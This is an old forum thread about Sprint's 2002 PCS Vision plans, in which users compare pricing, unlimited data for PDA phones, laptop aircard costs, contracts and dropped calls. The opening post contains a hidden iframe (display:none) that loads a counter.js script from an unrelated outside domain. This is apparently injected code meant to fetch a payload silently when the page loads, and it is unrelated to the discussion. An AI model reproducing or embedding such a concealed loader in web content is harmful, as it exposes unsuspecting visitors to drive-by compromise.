+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast
    Administrator

Arrow Its Official! New Sprint Plans...

http://biz.yahoo.com/rc/021017/telec...s_price_1.html

no commentary needed! <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Wonder when the website will reflect this? Its nice to see sprint trying to keep up with the other carriers.

The website does reflect the change already. I just switched plans. Thanks Marc!

I just switched plans too! Got 3 phones under one plan and saved about $25/month. Check this out:

The website www.pcsvision.com/showcase/details.html?6 has all the pricings.

I noticed at the bottom, under the PCS Vision for Laptops and PDA's that it says "These plans are for customers who purchase PCS connection cards"

This implies that new Palm-enabled phones (like the SPH-I330) will get the unlimited vision for $10 under the Free & Clear with Vision.

To check it out, I called Sprint and talked with three departments, one from the phone ordering, one from the consumer service ordering section, and one from the business servce section. All three confirmed that PDA-enabled Vision phones (like the I330) will NOT have to pay extra for full vision. They fall under the PCS with VISION plans. So, the PDA phones will get unlimited Vision and be able to connect to a PC for downloads!

Now THIS is cool!
    www.pcsvision.com/showcase/details.html?6

Gadget Lover
    still none of them beat my old sprint plan... I pay $54.99 / month for 600 anytime... and 2900 N/W ( which are still 8pm - 7am ) .... and i use like 570 anytime mins per month... so i can't beat it!

$60 for 800 minutes comes close though...

and I just switched to T-mobile

well, lets hope that T-mobile comes out with similar prices too!.

......wait , I just thought about it, and the I-300 wouldn't work with Vizion, just regular 14K speed.

Oh well then, I guess all you guys have to get now the TREO (naaaahhhh) or wait and get the I330 or the new Kyo.

Still a very good plan. So, let me see if I get this straight, is free for 3 months and then just $10 after that?. just like the old wireless web plan?. if it is like that then sweeet, you all guys lucky!
    Last edited by yorch; 10-18-2002 at 12:43 PM.
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

...the old wireless web plan was never that sweet since the minutes were always taken from your peak allowance. Its my understanding, and I really hope this is true, that this plan offers unlimited access for the $10/month fee seperate from the included peak minutes. Which, of course, if true truly is SWEET!

if it is true then is THE plan to get, the posibilities are endless, if they do this, they truly give it to the masses and CDMA2000 could get EXTREMELY popular.

if it is like you say mj, you could even use a laptop, to browse websites, have a mini webserver, etc, etc

this is great news for you guys!, I'm happy for you....too bad I just signed a year contract

well, problably (I am really being optimistic here) that other carriers will follow, I still think is really unfair that the sidekick ONLY get to have full unlimited data whereas us pocketpc users have to pay by the byte. IT SUCKS!

Way to go Sprint, you are going to get a lot of people if all this is true!.......looking forward to come back next year!!!. Samsung IXXXX wait for me!
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

Ok, I agree that the unlimited plans are great, but in order to harness that bandwidth we must have data cables.

Anyone know where to get a data cable for any of Sprint's Vision capable phones?

I didnt see any listed under the accessories.

Thanks,

Keith

Thanks for the heads up! We have two phones on a business plan, and we did 4500/month with N&W for $160, plus free PCS-PCS calling. Both phones share the useage,

No contract was needed, but I did a 2 year contract and got a $100 service credit.

The best part was the customer rep, who helped me save money with the combined plan.

Can't wait to get a Vision phone - if only the Treo had a user replaceable battery.

David

Sorry Guys

I'm a Sprint PCS agent--the Unlimited Data on these plans are only using the internal web browser of a PCS phone. Data connection kits will no longer be available.

Sprint intends laptop users to use the Novatel or Sierra wireless cards. The Unlimited plan on it is $99.99/mo.

Reason: the pcs phone browsers use a lot less data throughput--the Sprint Servers strips unneeded bits for smaller displays, while on a laptop, its an open pipe.

But yes, for Palm phone users, this is a bonanza--but their ain't no free lunch. Unlimited for $99.99 on an Aircard/laptop is still a very reasonable price for the convenience and good speed.
    RO

all i gotta say is these are the plans ive been waiting for.

-mike

oron, How is it going to be with pocket pc users, like the Thera, and eventually, SprintPCS will come up with Pocket Pc devices, they still consume less data than a laptop, but more data than a Palm. is it still going to be the same?

re: Pocket PC-Sprint data plans

The Thera and other new Pocket PC entries, will all use "phone" type plans, that is, Unlimited data as part of your plan.

If you have a current Pocket PC, the YSIO card should ship any day now, will go into the CF slot, and convert the Pocket PC into a wireless device, including voice calling. We haven't been told how that will be handled yet.

RO
    RO

It looked like to me on the web site that if I were to change plans today, I would have to agree to another year?

My year is up next month and I'd like to keep my options open for now. Reason being, the signal strength at my house sucks. I basically have to go outside to make a call and even then, I still drop calls. Sucks when trying to take advantage of long distance being included. My girlfriend has a cheapy audiovox phone with Verizon and never drops calls.

As long as I can get Best Buy to swapout my "broken" I300 with an I330, I'll sign up for another year under one of these new plans.

Settings?

Just curious--how is your setting set on ROAMING?Automatic or Sprint PCS? Also, do you extend your antenna? Sprint phones drop far fewer calls when "forced" to Sprint PCS coverage, and the antenna can increase signal back to tower (necessary to maintain connection) by 25%.

RO

Originally posted by kdavis
    It looked like to me on the web site that if I were to change plans today, I would have to agree to another year?

My year is up next month and I'd like to keep my options open for now. Reason being, the signal strength at my house sucks. I basically have to go outside to make a call and even then, I still drop calls. Sucks when trying to take advantage of long distance being included. My girlfriend has a cheapy audiovox phone with Verizon and never drops calls.

As long as I can get Best Buy to swapout my "broken" I300 with an I330, I'll sign up for another year under one of these new plans.
    RO

Administrator

Arrow

oron, im sending you a PM...

Roaming was set to auto....I'm game to try the Sprint PCS only setting. I see Marctronixx read your message about the antenna. There was a lot of talk on this board earlier in the year about removing the antenna as it is not necessary in PCS mode....interesting. Please share your discussion about the antenna if/when you think it's appropriate.

Thanks for the reply....I'll let you know if the change to Sprint PCS only helps.

...the antenna isn't necessary. no matter what anyone tells you, we can all testify to that for you.